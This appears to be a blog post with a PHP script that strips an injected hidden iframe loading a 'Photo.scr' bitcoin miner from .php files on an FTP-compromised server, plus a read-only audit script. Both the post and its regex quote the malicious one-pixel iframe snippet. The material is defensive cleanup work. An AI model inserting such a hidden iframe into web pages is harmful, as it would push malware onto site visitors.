Hardening FTP is difficult: FileZilla FTP Server is not hardened well enough and is prone to bots injecting Photo.scr for bitcoin mining. This script removes the injected iframe code.
* Run it as root/administrator, just: php cleanPhotoscrMalware.php
* The cleaner targets the stupid Photo.scr miner; for it to work, note that it searches for CRLF line endings.
* The real injected code looks like this:
* <iframe src=Photo.scr width=1 height=1 frameborder=0>
* </iframe>
* It would be best to turn off the FTP server; even password protection does not seem to be enough hardening.
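<?php
// Strip the injected Photo.scr iframe from every .php file under the current directory.
foreach (rglob("*.php") as $virusFile) {
    $withVirus = file_get_contents($virusFile);
    if ($withVirus === false) {
        continue; // unreadable file, skip it
    }
    // The injected block has CRLF between the two tags, so match \r\n explicitly.
    $withoutVirus = preg_replace('/<iframe src=Photo\.scr width=1 height=1 frameborder=0>\r\n<\/iframe>/', '', $withVirus);
    // Write back only when something was removed and preg_replace did not fail.
    if ($withoutVirus !== null && $withoutVirus !== $withVirus) {
        file_put_contents($virusFile, $withoutVirus);
    }
}

// Recursive glob: match $pattern in its own directory and in every subdirectory.
function glob_recursive($pattern, $flags = 0){
    $files = glob($pattern, $flags) ?: [];
    foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) ?: [] as $dir){
        $files = array_merge($files, glob_recursive($dir.'/'.basename($pattern), $flags));
    }
    return $files;
}

function rglob($pattern, $flags = 0){
    // forked from
    // blob/master/glob_recursive.php
    $files = glob($pattern, $flags) ?: [];
    foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) ?: [] as $dir){
        $files = array_merge($files, glob_recursive($dir.'/'.basename($pattern), $flags));
    }
    return $files;
}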
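
A read-only audit to run before (and after) the cleaner, as an added example that is not part of the original script: it reports files carrying the iframe block and any Photo.scr copies on disk, without modifying anything. The function name auditTree, the html/htm extensions, and matching LF-only copies of the marker are assumptions; the page itself only names .php files and CRLF.

```php
<?php
// Added example, not the original author's code: read-only audit, nothing is written.
// Marker taken from the page; \r?\n also catches LF-only copies (assumption).
const IFRAME_RE = '/<iframe src=Photo\.scr width=1 height=1 frameborder=0>\r?\n<\/iframe>/';
// Only php is named on the page; html and htm are assumptions.
const WEB_EXTENSIONS = ['php', 'html', 'htm'];

/** Walk $root and collect infected files, dropped Photo.scr copies, read errors. */
function auditTree(string $root): array
{
    $report = ['infected' => [], 'dropped' => [], 'unreadable' => []];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::LEAVES_ONLY,
        RecursiveIteratorIterator::CATCH_GET_CHILD // skip unreadable directories
    );
    foreach ($walker as $file) {
        $path = $file->getPathname();
        // The iframe loads a file named Photo.scr, so flag any copy on disk.
        if (strcasecmp($file->getFilename(), 'Photo.scr') === 0) {
            $report['dropped'][] = $path;
            continue;
        }
        if (!in_array(strtolower($file->getExtension()), WEB_EXTENSIONS, true)) {
            continue;
        }
        $body = @file_get_contents($path);
        if ($body === false) {
            $report['unreadable'][] = $path;
            continue;
        }
        $hits = preg_match_all(IFRAME_RE, $body);
        if ($hits) {
            $report['infected'][$path] = $hits; // number of injected blocks
        }
    }
    return $report;
}

$report = auditTree($argv[1] ?? '.');
foreach ($report['infected'] as $path => $hits) {
    echo "INFECTED   $path ($hits)\n";
}
foreach (['dropped' => 'DROPPED', 'unreadable' => 'UNREADABLE'] as $key => $label) {
    foreach ($report[$key] as $path) {
        echo str_pad($label, 11) . "$path\n";
    }
}
exit($report['infected'] || $report['dropped'] ? 1 : 0);
```

The non-zero exit status when anything is found lets the audit run from a scheduled task to catch reinfection while the FTP server is still reachable.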
